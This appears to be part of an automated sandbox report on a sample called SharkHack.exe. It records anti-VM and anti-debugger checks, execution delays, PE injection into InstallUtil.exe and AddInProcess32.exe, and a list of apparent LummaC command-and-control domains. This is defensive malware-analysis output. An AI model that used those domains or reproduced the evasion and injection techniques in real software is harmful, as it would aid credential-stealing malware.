                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: Process Memory Space: SharkHack.exe PID: 6224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2476, type: MEMORYSTR
                          Tries to delay execution (extensive OutputDebugStringW loop)
                          Source: C:\Users\user\Desktop\SharkHack.exeSection loaded: OutputDebugStringW count: 1941
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: 1F50000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: 3990000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: 5990000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: 9900000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: A900000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: AB00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: BB00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: BEF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: CEF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3310000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 8620000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 9620000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 97E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: A7E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: AB60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: BB60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: CB60000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeWindow / User API: threadDelayed 2034Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeWindow / User API: threadDelayed 7821Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exe TID: 6544Thread sleep time: -2034000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exe TID: 2668Thread sleep time: -33000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exe TID: 6544Thread sleep time: -7821000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6484Thread sleep time: -71000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6840Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1772Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: SharkHack.exe, 00000000.00000002.2881426397.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2915403945.00000000044E3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                          Source: InstallUtil.exe, 00000007.00000002.2915403945.000000000443A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1220104579GSOFTWARE\VMware, Inc.\VMware VGAuth
                          Source: SharkHack.exe, 00000000.00000002.2875564569.0000000004C2D000.00000004.00000800.00020000.00000000.sdmp, SharkHack.exe, 00000000.00000002.2875564569.0000000004999000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2923724922.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: edAXEpi8n3lHGfSJaBhF
                          Source: AddInProcess32.exe, 0000000A.00000002.2925272325.000000000148F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.2925272325.000000000144D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                          Source: C:\Users\user\Desktop\SharkHack.exeCode function: 0_2_06020940 CheckRemoteDebuggerPresent,0_2_06020940
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043D910 LdrInitializeThunk,10_2_0043D910
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 900000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 900000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                          LummaC encrypted strings found
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                          Source: InstallUtil.exe, 00000007.00000002.2903541486.0000000003761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aliveindu.click
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 702000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B6000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7D8000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 51D008Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 900000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 902000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 9B6000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 9D8000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7B3008Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4B6000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4D8000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11FC008Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5D6000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5D8000Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1069008Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 442000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 445000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 453000Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 11A5008Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00438040 cpuid 10_2_00438040
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Users\user\Desktop\SharkHack.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
